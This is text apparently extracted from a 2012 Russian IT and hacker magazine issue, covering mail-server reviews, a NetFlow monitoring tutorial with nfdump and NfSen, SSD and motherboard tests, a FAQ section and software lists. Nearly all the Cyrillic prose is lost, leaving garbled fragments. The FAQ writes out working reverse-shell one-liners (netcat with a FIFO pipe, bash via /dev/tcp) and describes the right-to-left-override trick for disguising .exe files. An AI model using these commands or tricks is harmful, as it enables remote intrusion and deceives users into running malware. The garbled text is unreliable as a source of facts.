Axigen MS Outlook,
.
Axigen .
Debian,
RHEL CentOS 5/6, SUSE Linux Enterprise 10/11,
Fedora 12/13, openSUSE 11.2/11.3, FreeBSD
7.x/8.x, Solaris 10 x86/SPARC Win2k3/2k8 (x86/
x64). Virtuozzo
.
GUI-, ,
.
1015 .

,
.
, . Axigen Free Mail
Server (Office Edition)
e-mail .

- Rumble

Axigen
: Axigen
: axigen.com/ru
: GNU GPL
: Linux, FreeBSD, Solaris, Windows

, ,
(SMTP/POP3/IMAP) , ,
, Gecad Technologies.

-, Ajax,
.
,
.
:
, , ,
.
/
CSV
. ,
, ActiveSync
, .

.
- ( 9000- ), .
.
LDAP-
( OpenLDAP eDirectory)

126

08 /163/ 2012

CommuniGate Pro
: CommuniGate Pro
: communigate.com
: Free/
: *nix, Windows, Mac OS X


, IM, VoIP, . , VoIP
/ , ,
(IVR), , ,
. CommuniGate
( ), IPv4
IPv6, SMTP, SIP, IMAP,
XMPP, LDAP, RADIUS, XIMSS, CalDAV, WebDAV,
MAPI .
(Session Border Controller)
NAT-. CGP LDAP- .
BlackBerry
AirSync ( ).


. ,
.

-,
, . -
,
(
). -


PDA
WAP . VoIP
- .

, , POP3-, ,
.


. ,
,
.

.
(,
), SIP Farm.
. ,
CommuniGate Pro IP-
SIPNET.

, Active Directory
, .
IP-,
.
, ,
SSL, TLS,
S/MIME .
API .


. -

- CommuniGate Pro

,
Sophos, McAfee, MailShell, Cloudmark.
,
DNSBL (RBL),
IP- ,

.
, ,

. , ( 8010- ,

).
,
, .

, .
Community Edition,
, Corporate Edition Service
Provider .

ZENTYAL
, Linux ,
, .
Zentyal (zentyal.org) ,
Ubuntu Server ( Ubuntu 12.04 LTS)
. Zentyal
, UTM,
.
/. ,
. Zentyal ,
, master/slave
LDAP/AD.

08 /163/ 2012


,

. , .

iRedMail, Axigen Rumble;
,
,
Axigen, IndiMail CommuniGate
Pro. VoIP. z

127

SYN/ACK
SYN/ACK

(grinder@synack.ru)


NETFLOW


,

: , ,
.
,
NetFlow.
NETFLOW
NetFlow Cisco
(goo.gl/vM2l7) , .
, NetFlow Cisco,
( Juniper Enterasys) .
. NetFlow v1,
1990 , ,
( , ),
.
Netfilter. , 2004
RFC 3954. v9 IPFIX (IP Flow Information Export, RFC 3917),
NetFlow v10. v24
Cisco, .
v5,
IPv4-. ,
(flow record) TCP/IP. v5 , ,
, IP , , TOS- TCP-.
IPv6, MPLS, BGP -

128

. , Cisco ASA NetFlow . ,


v9 (Network Security Event
Logging, NSEL), .
NetFlow-:
( ,
flows) .
,
. , , ,
;
, UDP
SCTP (Stream Control Transmission Protocol),
; .
2055- , 9555, 9995 ,
;
( ).
,
, : + + .
,
.
UDP-, UDP
. , , .
v8 v9,
.
SCTP.
,
NetFlow NetFlow: ,
,
, , . UDP ,
, UDP .
samplicator (code.google.com/p/samplicator),
UDP . ,
. TCP,
,
, -
( ,
). , ,
Sampled NetFlow, , -

08 /163/ 2012

IP- fprobe

, (
). , Sampled NetFlow
, ,
.

$ sudo nano /etc/default/fprobe


# "any"
INTERFACE="eth0"
FLOW_COLLECTOR="192.10.0.2:9001"
# ; , "-f"
# ;
# IP-, "-fip"
OTHER_ARGS="-fip"

fprobe , ,
, ( r
0), (B q),
(t). tcpdump .

LINUX
NetFlow
, DD-WRT . ,
VMware vSphere 5
NetFlow v5,
. ,

. Cisco NetFlow
192.10.0.2:9001 :
router(config)#
router(config)#
router(config)#
router(config)#
router(config)#

interface fastethernet 0/0


ip route-cache flow
ip flow-export version 5 origin-as
ip flow-export 192.10.0.2 9001
ip flow-cache timeout active 5

NetFlow-, :
fprobe (fprobe.sourceforge.net) Linux,
libpcap, fprobe-ulog, libipulog;
ipt-netflow Linu :
iptables;
softflowd (code.google.com/p/softflowd) Linux/FreeBSD,
NetFlow v1/v5/v9;
pfflowd (mindrot.org/projects/pfflowd) OpenBSD;
nProbe (ntop.org/products/nprobe) / Linux, FreeBSD Windows, NetFlow v5/v9/
IPFIX;
IPCAD (lionet.info/ipcad) Linux, FreeBSD, OpenBSD, Mac
OS X/Darwin Solaris, raw BPF-, PCAP,
iptables ULOG & IPQ;
fSonar (softpiua.com/ru/products/softpi/fsonar.html)
Windows, NetFlow v5/v9;
ndsad (ndsad.sf.net) , NetFlow v5
Windows (winpcap), Linux (libpcap), Mac OS X FreeBSD;
PRTG Network Monitor (paessler.com/netflow_monitoring) Windows XP
( ).

$ sudo tcpdump -n udp port 9001

,
NetFlow: -T cnfp. Softflowd. ,
, , .

+

.
flow-tools,
, . flow-tools
Perl- FlowScan
(caida.org/tools/utilities/flowscan),
flow-capture ( NetFlow flow-tools) RRD. FlowScan
: CUFlow,
CampusIP, SubNetIO. ,
nfdump (nfdump.sf.net), NetFlow v1/v5/
v7/v9 IPFIX ( ),
NfSen (Netflow Sensor, nfsen.sf.net).
NSEL- nfdump, Cisco ASA. nfdump
: nfcapd (,
), nfdump ( ), nfprofile ( ,

,
NetFlow, . ,
Ubuntu/Debian
.
$ sudo apt-get install fprobe


, ( IP- ).
.
/etc/default/fprobe:

08 /163/ 2012

NetFlow- tcpdump

129

SYN/ACK
SYN/ACK
), nfreplay (
/), nfclean.pl
( ), ft2nfdump ( flow-tools
nfdump). nfcapd
( ,
), nfdump.
, nfdump Ubuntu/Debian
:

NFSEN
NfSen (sf.net/apps/
trac/nfsen-plugins).
plugins, nfsen.conf,
.

$ sudo apt-get install nfdump

nfcapd nfdump
NfSen. nfdump
, , /etc/default/nfdump:
$ cat /etc/default/nfdump
# nfcapd is controlled by nfsen
nfcapd_start=no

, .
nfcapd-, UDP-:

NFSEN
NfSen. ,
. PHP Perl,
RRDtool. LAMP-
Perl- Mail::Header Mail::Internet. :
$ sudo apt-get install apache2 libapache2-mod-php5 \
php5-common libmailtools-perl rrdtool librrds-perl

$ sudo nfcapd -w -D -l /var/cache/nfdump/router1 -p 9001

, ,
'-b'. '-R host/port'
NetFlow- .
'-p' , pcap-.
nfdump, :
$ sudo nfdump -R var/cache/nfdump/router1
Date flow start Duration Proto Src IP Addr:Port Dst IP
Addr:Port Packets Bytes Flows
2012-07-05 10:09:12.112 0.001 UDP 22.22.22.22:1234 ->
192.10.19.10:22 1 400 1

$
$
$
$

wget -c http://goo.gl/CYk4s
tar xzvf nfsen-1.3.6p1.tar.gz
cd nfsen-1.3.6p1
cp etc/nfsen-dist.conf etc/nfsen.conf

.
, , .

, , ,
nfdump
(line, long, extended custom),
line. ,
'-o'. nfdump , ,
man nfdump,
.

$ nano etc/nfsen.conf
$BASEDIR = "/usr/nfsen";
# ,
$HTMLDIR = "/var/www/nfsen/";
# , nfdump
$PREFIX = '/usr/bin';
# , -
$USER = "www-data";
$WWWUSER = "www-data";
$WWWGROUP = "www-data";
# , ,
# "col"

, NfSen

, Flowscan

130

08 /163/ 2012

, NfSen

NfSen

%sources = (
'ROUTER1' => { 'port' => '9001',
'col' => '#0000ff', 'type' => 'netflow' },
);

$ sudo update-rc.d nfsen defaults 20

Apache:
$ sudo nano /etc/apache2/conf.d/nfsen.conf
<Directory /var/www/nfsen/>
DirectoryIndex nfsen.php
</Directory>

$MAIL_FROM = 'admin@example.com';
$SMTP_SERVER = 'smtp.example.com';

, nfcapd, ,
. .
$ sudo ./install.pl etc/nfsen.conf

Perl-,
nfsen.conf . nfsen, nfcapd:
$ sudo /usr/nfsen/bin/nfsen start

:
$ sudo ln -s /usr/nfsen/bin/nfsen /etc/init.d/nfsen

http://_/nfsen/nfsen.
php
. ,
IP-, .
any, proto TCP. ,
SSH-, src or dst port 22,
IP . Live,
, nfsen.conf.
, (Live New Profile).
, . z

PMACCT
Pmacct
,

: ISP, IXP, CDN, , - .
Linux, *BSD, Solaris
. IPv4 IPv6,

(libpcap, Netlink/ULOG, NetFlow v1/v5/v7/
v8/v9, sFlow v2/v4/v5 IPFIX),
(IPFIX,
NetFlow v5/v9 sFlow v5)
memory tables, MySQL, PostgreSQL, SQLite,
BerkeleyDB .
, ,
,

08 /163/ 2012

, .
BGP-
IS-IS/IGP-
, BGP/
MPLS VPNs (RFC 4364).
(GTP).

, RRDtool, GNUPlot,
Net-SNMP, MRTG Cacti.

.
,
Pmacct, BWstat,
pNRG, pmGraph, netactuator, FloX (Flow eXplorer),
pmacct-frontend .

WWW

INFO

Cisco,
NetFlow:
goo.gl/vM2l7;



NetFlow 5 9.

FreeBSD
Softflowd: code.google.
com/p/softflowd;


UDP

samplicator
(code.google.com/p/
samplicator).

OpenBSD pfflowd: mindrot.


org/projects/pfflowd;
nfdump:
nfdump.sf.net;

nfdump NfSen: nfsen.
sf.net.



,

,

.

WARNING
Sampled NetFlow
,

.

131

FERRUM

BE QUICK
OR BE DEAD


SATA 3.0
, , ,
.
, : 480 SSD

? 120 256
.

SANDFORCE

, , ,
. ,
HDD,
. , SSD
.
,
:
- SSD.

. , Apple
NVIDIA, SandForce, , ,

LSI Corporation. , SandForce, ,

NAND-,
SSD .

Marvell, SandForce
SF-2281. Intel
,

Intel SSD 520 Series.

132


,
, ,
,
. ,
. ,
:
/ 500 /, SandForce SF-2281,
.
? ,

SSD, -,

.
,
Toggle-mode DDR NAND.
,

SandForce

/

SSD.

?

.
,
-.

5/5 /,
SSD.
, , JPG, MP3
, .
/

SSD , /
. ,

. , -

Corsair CSSD-F120GBGT-BK
Corsair CSSD-P128GBP-BK
Intel SSDSC2CW240A3K5
KINGMAX KM240GSMP35
Kingston SH100S3/120G
OCZ VTX3-25SAT3-240G
Plextor PX-256M3P
PNY P-SSD2S120G3-BLK
Verbatim SSD SATA III

. SSD
, . 2 ,
, ,
3- .
, ,

SandForce.



(
).
SSD PCMark Vantage
( HDD) , .
,

. ATTO Disk Benchmark
, SSD
,
,
HDD.
(
128 ) ( 4 )

Iometer.
, ,
. , 240
120

SandForce. .


: Intel Core i7-3960X, 3300
: ASUS P9X79 PRO
: 4 4 , G.SKILL F31700CL9-4GBZH, DDR3 1600
: Sapphire Radeon HD 3450
: Corsair CSSD-F120GB2-BRKT
: Corsair CP-9020006
: Windows 7 , 64-

08 /163/ 2012

Be quick or be dead

CORSAIR CSSDF120GBGT-BK
orsair SSD SATA 3.0: Force
Series 3, Perfomance
Series Pro Force Series GT.

. ,
, . 3,5 2,5- .
Corsair CSSD-F120GBGT-BK SandForce SF-2281 ,
25- .
,
/ Iometer,
Intel.
,
SSD 120 ,
. ,
1,7 .

6000
.

INTEL SSDSC2CW240A3K5
Intel SSD 520 Series SATA 3.0 Cherryville
, SSD 60 480 .
, 510- . ,

Marvell 88SS9174-BKK2, Cherryville ,
-, SandForce SF-2281.
SSD Toggle-mode DDR
NAND 25 .
Intel SSDSC2CW240A3K5
. :

SSD: SATA, Molex SATA, - -. , ,
,

, Intel. , Intel
SSDSC2CW240A3K5 .

12 600
.

08 /163/ 2012

133

FERRUM

KINGMAX KM240GSMP35
KINGMAX
: , , HDD,
, ,
. SSD
- 2,5 , mSATA Half-Slim.
KINGMAX KM240GSMP35 . ,
SSD . SandForce
SF-2281 , KINGMAX KM240GSMP35 . ,
, , , , 25 .
:
, . KINGMAX SMP35
Client (, ), , Intel
SSDSC2CW240A3K5, Molex SATA- , . KINGMAX SMP32 Client,
, .

8800
.

OCZ VTX3-25SAT3-240G
, OCZ . ,
SSD SandForce ,
. OCZ
,
. OCZ VTX3-25SAT3-240G
OCZ Vertex 3 SATA III 2.5''
SSD. ,
. , OCZ
1 ,
. OCZ VTX3-25SAT3-240G
, , , . , OCZ
SSD
, 2011 Indilinx.
OCZ VTX3-25SAT3-240G.
- ,
My SSD is faster than your HDD.

-:
:
:
:
:
:
:
:

134

Corsair CSSDF120GBGT-BK

2,5
SATA 3.0
MLC, , 25
SandForce SF-2281
555 /
515 /
2
20

11 400
.

KINGMAX
KM240GSMP35

Intel SSDSC2CW240A3K5

2,5
SATA 3.0
MLC, Toggle-mode DDR NAND, 25
SandForce SF-2281
550 /
520 /
1,2
240

2,5
SATA 3.0
MLC,
SandForce SF-2281
550 /
520 /
1,2
240

08 /163/ 2012

Be quick or be dead

VERBATIM SSD SATA III


Verbatim ,
.
, , ,
.
:
SSD.
2,5- .
, 2
.
SSD . , -
,
Verbatim SATA II:
USB, . Verbatim SSD SATA III
.

5200
.

KINGSTON SH100S3/120G
, Kingston SH100S3/120G -
SSD SATA 3.0,

. ,
,
.
Kingston SH100S3/120G
, .
SandForce
SF-2281, ,
25- .
3,5 . ,
, Kingston
SH100S3B/120G ,
. SATA-, , , 2,5-
USB 2.0 Acronis.
,
SSD,
HDD .

6600
.

OCZ VTX325SAT3-240G

2,5
SATA 3.0
MLC, , 25
SandForce SF-2281
550 /
520 /
2
240

08 /163/ 2012

Verbatim SSD
SATA III

2,5
SATA 3.0
MLC
SandForce SF-2281
550 /
510 /
2
120

Kingston
SH100S3/120G

2,5
SATA 3.0
MLC, , 25
SandForce SF-2281
555 /
510 /
1
120

Corsair CSSD-F120GBGT-BK
,
. -
SSD, Intel SSDSC2CW240A3K5.
,
, ,
, -
. z

135


PCMARK VANTAGE,

PCMARK VANTAGE, /

Corsair CSSD-F120GBGT-BK

Corsair CSSD-F120GBGT-BK

Intel SSDSC2CW240A3K5

Intel SSDSC2CW240A3K5

KINGMAX KM240GSMP35

KINGMAX KM240GSMP35

Kingston SH100S3/120G

Kingston SH100S3/120G

OCZ VTX3-25SAT3-240G

OCZ VTX3-25SAT3-240G

Verbatim 47378

Verbatim 47378

0
00
60 0
00
58 0
00
56 0
00
54 0
00
52 0
00
50 0
00
48 0
00
46
PCMark Vantage

0 50 100 150 200 250 300 350 400 450

Windows Defender
Gaming
Improting Pictures to Windows photo Gallery
Windows Vista startup
Video editing using Windows Movie Market
Windows Media Center
Adding music to Windows Media Player
Application loading


PCMark Vantage

IOMETER: /
(4 ), /

IOMETER:
/ (128 ), /

Corsair CSSD-F120GBGT-BK

Corsair CSSD-F120GBGT-BK

Intel SSDSC2CW240A3K5

Intel SSDSC2CW240A3K5

KINGMAX KM240GSMP35

KINGMAX KM240GSMP35

Kingston SH100S3/120G

Kingston SH100S3/120G

OCZ VTX3-25SAT3-240G

OCZ VTX3-25SAT3-240G
Verbatim 47378

Verbatim 47378

10

15

20

Marvell

300

320

340

360

380

Iometer Marvell

IOMETER PATTERNS, /
Corsair CSSD-F120GBGT-BK
Intel SSDSC2CW240A3K5
KINGMAX KM240GSMP35
Kingston SH100S3/120G
OCZ VTX3-25SAT3-240G
Verbatim 47378
Database
Fileserver
Workstation
Webserver

10

20

30

40

50

60

70

400

12 2200 .
6 1260 .
,
!

.
: 210

GOOGLE CHROME 030

x 09 (152) 2011

LULZSEC
09 (152) 2011

082

LULZSEC / FOX NEWS

1. , , shop.glc.ru.
2. .
3.
:
e-mail: subscribe@glc.ru;
: (495) 545-09-06;
: 115280, ,
. , 19, ,
5 ., 21,
, .

500 .



WINDOWS 7

PHPMYADMIN
064

ANDROID 070
152

,
JAVASCRIPT 050

:
, ,
FOX NEWS



+ + 2 DVD:
162
( 35% , )

!
,
.

12 3890 (24 )
6 2205 (12 )

.
,

? info@glc.ru 8(495)663-82-77 ( ) 8 (800) 200-3-999 (


, , ).

FERRUM

, ,

Z77 !

GIGABYTE
G1.SNIPER 3

: LGA1155
: Intel Z77 Express
: 4 DIMM,
DDR3 1066-2666
: 4PCI Express
x16, 2PCI Express x1, 1PCI
: 6SATA
3.0, 4SATAII, 1mSATA
: 5.1 Creative CA0132
: 1Intel 1000 /,
1Qualcomm Atheros Killer E2201
1000 /
:
1HDMI, 1DisplayPort, 1DVI-D,
1D-Sub, 1PS/2, 2RJ-45,
6USB 3.0
-: E-ATX


: Intel Core i5-2500K,
3,3
: MSI TWIN FROZR II
HD 5830, 1024
: G.Skill
Ripjaws-Z F3-17000CL9Q-16GBZH,
24
: Corsair CSSDF120GB2, 120
: ENERMAX Platimax,
750
: Windows 7

Super Pi 1.5XS 1m: 10,058


wPrime 1.55 32m: 8,963
wPrime 1.55 1024m: 285,55
WinRAR: 3111 /
CINEBENCH R11.5: 5.5

138

11 700
.

08 /163/ 2012

, , Z77 !

, ,
Z77 Express H77 Express.
Ivy Bridge, , GIGABYTE G1.Sniper 3.

GIGABYTE G1.Sniper 3 : -

.
,
, G1-Killer.
,
PCI Express x16,

.
,
12.

, , , .


?

PCI Express x16 .

x16 + x16, 16 + 8 + 8,
8 + 8 + 8 + 8.
Intel Ivy Bridge PCI Express x16
16, PLX PEX8747 GIGABYTE
16. !


ATX4P,
ATX12V.

, SATA.


Intel
. , DMI 2.0. C ,

.
,
USB 3.0 DMI 2.0. USB 3.0
Intel.
16 PCIe , .

08 /163/ 2012

GIGABYTE G1.Sniper 3
- E-ATX,
. PCI Express
x16, PCI Express x1
- PCI.
.
SSD
mSATA.
,
.
GIGABYTE G1.Sniper 3 ,
. 64
,
HDD SSD. ,
.
. , Reset,
BIOS,
POST-.


.
SATA-, .

, RAID
0/1/5/10. SATA 3.0, CPU,
Marvell 88SE9172,
RAID 0 RAID 1.
I/O- : RJ-45, HDMI, DisplayPort,
DVI-D, D-Sub, USB 3.0,

USB 2.0.
S/PDIF.


GIGABYTE G1.Sniper 3 GIGABYTE Ultra
Durable 4,
,

. ,
, ,
.
BIOS,

. UEFI BIOS,
GIGABYTE
.

, .
G1-Killer

(Killer Game Networking Intel
Gigabit Ethernet) ,
Creative.

USB 3.0
,
. Bluetooth 4.0
Wi-Fi 802.11n,
PCI Express x1,
.


GIGABYTE G1.Sniper 3 ,

GIGABYTE ,
. GIGABYTE G1.Sniper M3
- mATX, PEG-,
PCI Express x1,
2400 ,
SATA II SATA 3.0 RJ-45
. ,
.


GIGABYTE G1.Sniper 3 .
Super Pi 1.5XS
1
,
. wPrime 1.55
, 32 1024
, .

CINEBENCH R11.5 WinRAR
.

,
GIGABYTE G1.Sniper 3
, . ,
,
Intel

.
,
. GIGABYTE
G1.Sniper 3, ,
,
Wi-Fi 802.11n Bluetooth 4.0,

PCI Express x16. z

139

FAQ

, Digital Security (cherboff@gmail.com)

FAQ


FAQ@REAL.XAKEP.RU


IDE,

.
?
IDE A
, ,
,
.


,
.
,

EditorConfig (bit.ly/editorconfig).
,
,
,
Notepad++ Sublime Text 2
Emacs Visual Studio.
.editorconfig.
.htaccess, - Apache,
.
, .

, .
-:
;
;
root = true
;
[*.py]
;
indent_style = space
;
indent_size = 4
;
end_of_line = LF

Linux
Netcat,
'-e' '-c',
?
Netcat
A TCP/IP.
,
-
? ;-)
.
, . -

, .
Netcat bash
, FIFO-.

nc -e /bin/bash 192.168.1.13 1337

:
mkfifo pipe;
cat pipe|/bin/bash|
nc 192.168.1.13 1337 >pipe;
rm pipe

\
\
\

bash
,
Netcat,
TCP, /dev/tcp.
- :
/bin/bash -i >
/dev/tcp/192.168.1.13/1337
0<&1 2>&1

\
\

:
Windows
ARP-poisoning?
,
A

HTTP-
, ,
,

. HTTP ,

Burp Suite
.

140


Burp.
( Proxy Options)
,
loopback-, Generate CA-signed per-host
certificates. ,
ProxyDroid ( Google Play),

.


,
, .
Burp Suite IP .
, ,

, , Generate a
CA-signed certificate with a specific hostname,
.

08 /163/ 2012

MITM-

. ARP-

VBS
.


DecaffeinatID (bit.ly/decaffeinatid) ARPFreeze
(bit.ly/arpfreeze).
Irongeek

.
IDS,

ARP-,
(
) .


. ARPFreeze ,
GUI- netsh ARP,
DecaffeinatID

IP- MAC-.
,
ARP-,
,

.
Android Google Play ?

A
, , ,

apk-. , , ! :-)

Chrome APK Downloader (bit.ly/apkdownload).
,


.
FiletypeID
(bit.ly/filetypeid).
4720 ,

. ,

50/50, ,
,
(Fat elf),
,
.




,
.
?

, ,
, ,
Hex-,
,

ANDROID, SSL?


. IE
, Burp,
.
, , . ,
,
. .

08 /163/ 2012


,

,
,

.
cer- SD- .
Location & Security
Install from SD card
.

Profit!
,
,
.
, , - ,
Proxy Burp Suit


.

141

FAQ
,

, - . , ,
/, Device ID,
.
Device ID, Google Play.

, apk-
,
,
.

Windows,
?
Windows
A
,
.

, .exe
,

-
(RIGHT-TOLEFT OVERRIDE).
,

.
,

justafile3pm.exe

- u\202e
e 3. - .exe, ,

justafileexe.mp3

RLO- , U+202E:
Right-To-Left Override.

TCP?

A
, ,
,
TCP-data , .

Matasano Port Forwarding
Interceptor,
.
PFI TCP- .
IP- , ,

142

Matasano Port Forwarding Interceptor

,
. /
TCP-.


,
. ,

,

.

HDMI HEC.

HEC (HDMI Ethernet


Channell),

,
HDMI 1.4,
2009 .

HDMI- (,
).
,
.
,
Fast Ethernet
100 / full
duplex. ,
,
. ,
HEC
, HDMI 1.4.
.


DOMXss?
, DOMXss
A
,
,
.

,

.

Firefox DOMinator (bit.ly/domxsstool).




.
-
?
DDoSA , -

- -.

, , ,
.
, ,
,
.
ApacheBench (ab).

,
- Apache.
, ab
URL , ,
,
.
URL.

ab -n 10000 https://myservice.tst/
myscript.php


.
:
,
HTTP-,
HTTP-, ,
POST PUT.

SSL- (SSL2, SSL3, TLS1)
. z

08 /163/ 2012

>Net
AthTek NetWalk
BWMeter 6.2.2
Connectify 3.5.1
DNSDataView 1.40
GMail Drive 1.0.19
GNS3 0.8.2
IMAPSize 0.3.7
mRemoteNG 1.69

>Multimedia
AIMP 3.10
doPDF 7.3.381
Fotobounce 3.7.2
FotoSketcher 2.30
Foxit Reader 5.3.1
Machete Lite 3.8
MetatOGGer 4.5
MPTagThat 3.0.7
Okozo Desktop 2.1.1
Poladroid 0.9.6
SaveGameBackup.net 1.41
Sculptris Alpha 6
Similarity 1.7.1
SMRecorder 1.2.4
SPlayer 3.7
VidCoder 1.3.2
YACReader 0.4.5

>Misc
Auspex 1.3.5.118
AutoHotkey 1.0.48.05
AutoIt 3.3.8.1
Boot Snooze 1.0.5
ClipX 1.0.3.9
File Bucket 1.1.0
FluffyApp 2.0b4
Input Director 1.2.2
ManicTime 2.3
Moo0 FileShredder 1.17
OnTopReplica 3.3.2
QTTabBar 1.5.0.0
Registry Commander 12.01
RidNacs 2.0.3
SnakeTail 1.6
TreeSize Free 2.7
UltraSearch 1.6

>>WINDOWS
>Development
ActivePerl 5.14.2
ActivePython 2.7.2
ActiveTcl 8.5.11
Aptana Studio 3.2.0
Arcadia 0.11.1.2
CodeLobster PHP Edition 4.2.1
DEV-C++ 4.9.9.2
Dojo Toolkit 1.7
HTTP Debugger Pro 4.6
Komodo IDE 7.0.2
LispIDE 20100318
Nemerle 1.1
PluThon 2.0.0
PyDev 2.6.0
ReSharper 6.1.1
SQL Uniform 2.1.1
SQLiteStudio 2.0.27
WaveMaker 6.4.6

>Devel
Blueprintcss 1.0.1
Buildroot 2012.05
Cascading 2.0
Cool-php-captcha 0.3.1

>>UNIX
>Desktop
Avidemux 2.5.6
Datacrow 3.9.14
Digikam 2.6.0
Djvusmooth 0.2.12
Easyimagesizer 3.0.5
Emacs 24.1
Ffmpeg 0.11.1
Flvmeta 1.1.0
Gmsh 2.6.0
Gmtp 1.3.3
J7z 1.2.0
Krut 0.9.3
Mplayer 1.1
Pdf2djvu 0.7.13
Photofilmstrip 1.5.0
Piedock 1.6.1
Qtractor 0.5.5
Vidrop 0.6.8

>System
Cameyo 2.0.831
CCEnhancer 3.4
CCleaner 3.20
CPU-M Benchmark 1.3
CrystalDiskInfo 5.0
DHE Drive Info 3.2.493
Disk Investigator 1.31
DriverIdentifier 4.1
HWiNFO32 4.00
IObit Uninstaller 2.2
Logstalgia 1.0.3
Moo0 SystemMonitor 1.64
RouterPassView 1.40
Soluto 1.3 Beta
UnknownDevices 1.5.2
WinContig 1.10

>Security
Alpha3
API Monitor 2
BoxCryptor 1.3.2
Hook Analyser 2.0
JSDetox 0.1.0
kbsslenforcer
Pafish
pdbparse
PEFrame 0.2
pev 0.5
PowerSploit
pyloris 3.2
Wireshark 1.8.0

Nemesis 1.4
Odysseus 2.0.0.84
Pamela 4.8
Probe Web Server 1.0
RFIDIOt 1.0a
UltraVNC 1.0.9.6.2
VodBurner 1.0.5
Xfire 1.149

>Server
Apache 2.2.22
Asterisk 10.5.1
Bind 9.9.1-p1
Cups 1.5.3
Dhcp 4.2.4
Dovecot 2.1.7
Freeradius 2.1.12
Lighttpd 1.4.31
Mysql 5.5.24
Nsd 3.2.10

>Security
Barada 0.5.3
Clamav 0.97.5
Clonewise
Dnscrypt 0.10.1-2
guile-dlhacks
Intersect-2.5
kbsslenforcer
Laudanum 0.4
Netusse
Netzob 0.3.3
pdbparse
pev 0.5
pyloris 3.2
qcombbdbg
Ratproxy 1.58
Squert 0.9.2
Subterfuge 3.0 beta
Websitecds 1
Wireshark 1.8.0
WPSCrackGUI 1.1.8

>Net
Amsn 0.98.9
Damnvid 1.6
Dante 1.4.0pre1
Eiskaltdcpp 2.2.7
Evolution 3.4.3
Firefox 13.0.1
Frei-chat 7.2
Gmail-plasmoid 0.7.20
Googlecl 0.9.13
Httppp 1.2.0
Liferea 1.8.6
Lince 1.3
Myagent-im 0.4.6
Opera 12.00
Skype 4.0.0.7
Uhub 0.4.0
Voicechatter 1.5.0
Wfs 2.01

Geany 1.22
Gecrit 2.8.3
Haskell-platform 2012.2.0.0
Iep 3.0
Kcov 9
Kyua 0.4
Libzdb 2.10.4
Liteide 12
Liwc 1.21
Nal 20110221
Phpgrid 1.4.1
Pypy 1.9
Rstudio 0.96.304
Ruby 1.9.3p194

>>MAC
Bean 3.2.0
Emacs 24.1
FlashToHTML5 1.8
iMediaHUD 1.2.7
JaBack 9.15
keka 1.0.3
KeyRemap4MacBook 7.8.0
MacRuby 0.12
OSXFUSE 2.4.2
Palringo 4.6.2
Raw Photo Processor 4.6.0
SABnzbd 0.7.0
Sleipnir 3.5.0.1
SoundSource 2.5.1
Sparrow 1.6.2
SQLite 3.7.13
TRIM Enabler 2.2
VUWER 1.5.5

>X-distr
Oracle Linux 6.3

>System
Bindfs 1.10.4
Bumblebee 3.0
Catalyst 12.4
Cfengine 3.3.4
Crush 2012-02
Guacamole 0.6.0
Meld 1.6.0
Nouveau 1.0.1
Oobash 0.39.5
Ppss 2.97
Psmisc 22.19
Qemu 1.1.0-1
Sali 1.5.2
X11 7.7
Xenomai 2.6.0

Openldap 2.4.31
Openvpn 2.2.2
Postfix 2.9.3
Postgresql 9.1.4
Pure-ftpd 1.0.35
Samba 3.6.6
Sendmail 8.14.5
Snort 2.9.2.3
Sqlite 3.7.13
Squid 3.1.20
Syslog-ng 3.3.5
Unbound 1.4.17
Vsftpd 3.0.0

07 (163) 2012

FAQ

WWW2
SEPROX

-
API

seprox.ru
, .
( ), IP , - ,
. ? , seprox. -
. :
(SOCKS/HTTP), , , (GET, POST, cookies, referrer, SSL),
.
-. API,
, , HTTP- . : http://bit.ly/OtVlRG.

mathics.net
,
MATLAB Octave
. Mathics. ,
Mathematica.
, GitHub
Python, , mathics.net .
, ,
, -
. , .
, .

www.peeep.us
, ,
( , ,
), , ,
. Peeep.us,

www.peeep.us/eae7be19. ,
HTML/JS- . , -
- , .

attachments.me
,
.
, , : , , Photos Dropbox-. . ,
. Dropbox
Google Drive Box. Gmail Chrome, .
: , Gmail
.

MATHICS

PEEEP.US

ATTACHMENTS.ME

144

08 /163/ 2012